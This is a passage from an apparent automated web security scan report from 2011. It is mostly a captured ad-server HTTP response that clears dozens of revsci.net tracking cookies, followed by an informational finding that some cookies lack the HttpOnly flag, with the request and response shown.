Set-Cookie: rsiPus__hgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zCmS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zB78=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3cxz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0Svs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tIki=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VmnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VnuE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jU0b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FnTH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8VJk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E_cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-r_t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_c9Qy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_okZc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_f9hD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_piZk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_amP2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jzux=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_S261=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_U-lS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GRM2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ru44=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_05qP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_WUD5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_37Ra=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pdjm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wQ9i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TgmM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_F1aA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wtKf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qaRA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jxPB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AOct=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Hvpv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_umeK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bqao=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zXe7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mcS7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nSV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dXYl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_r5h4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YGYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uOdh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t8un=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UhXN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Yggs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tFKi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dMCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jUrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HPp6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3Us7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UTqe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NyfH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C1HA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hCo4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uBS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mAGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RObH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uEcy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xCvN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ebxh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j_e_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9mAa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-4qM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fMbS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AKta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pXq4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_g7pa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zbII=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GEDh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MRmN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5uiD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JGOr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kry8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Y6sq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_psQo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JI-L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PAkW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SRnI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aSXs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hcp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bq8b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lww9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_n6fk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__KA3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YeNy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Pk3I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_65qD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuxR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l77R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GQV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2jdP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7SED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_3Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PtS0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p1rh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-lLI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lfkx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yt-D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KhUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LqXQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Vodh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_r94O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0rr2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RAwv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AHDy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_moDT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7bUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fGcz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yrpy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Lezd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UF3V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Axdo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_COzm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OQKV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cwxp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zAmI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__HnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AAqA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s4s1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h7Ht=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NJdS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_28kw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_K7cs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oxSr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_itCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BpAi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BQYd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_CU4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mO5c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8TWQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XcRl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5yEt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2qz2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_m_1v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-tsc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nw0e=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OxDu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_U7pH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_P5td=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jRAO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zbnz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BRXn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kirp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ccsv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BRp5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NNfV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wN_v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JOM8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QJXH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fBja=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tbUz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Gg_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J1KA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DDfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6jYM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_P2pY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MKCJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tUnQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yzAv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E4FI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Fi8O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h2UP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3Yn9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LKfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BayI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RlWl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GMAx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tgf7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9Xoj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J2Ea=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__thJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ny38=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1tW9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nn6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RSEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OkuD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9izr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Qh75=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AzD0="MLtXrtUvti9nIDH3PvyuJZDWPvAb5rmAROC1vV+97tGjIq0KICE6IXNJpXbbtXk7SFglqytuSSifpijZkG/o9jHBIRbD9dvmp0CQ7vRdyOFH4TmnC/4OArLBdE8Hqi6o6R2PN9CCY2j1ylbdUwMYvE2vn/8yQK49ZcC2BmYHlP5TqASUaNd3SmSsruJoVhwue8QJ2Wq/HYRhwLuv+SBJuvZlzZ8Srsq2sIZOUsy2XdRmTdXJvYqRxcA7T88WNgvlk/lLSPEabgD9zqVd1+fJjSdNkIpDyzWJ1qz4xbxiA5hGMbHmUcIm4ZmDiZQ0lI1uhSsiwQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:35 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.24. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LRgg="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYN/uRo6Id0hREh+v8Fc2uaokZKJpx2IXRk9Dyfi2c1aOHwzLio/qTPpYwOAxf+gMWWRw/SfZW0XEPOmFgqfwHDvNqdtPLRpDPvktgUQxq/DIIEL8fjYOTDXguU+JUnX8LmFcFTLYjxY+AM+B/tNXVIestR1daPcVjXKw1W/g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
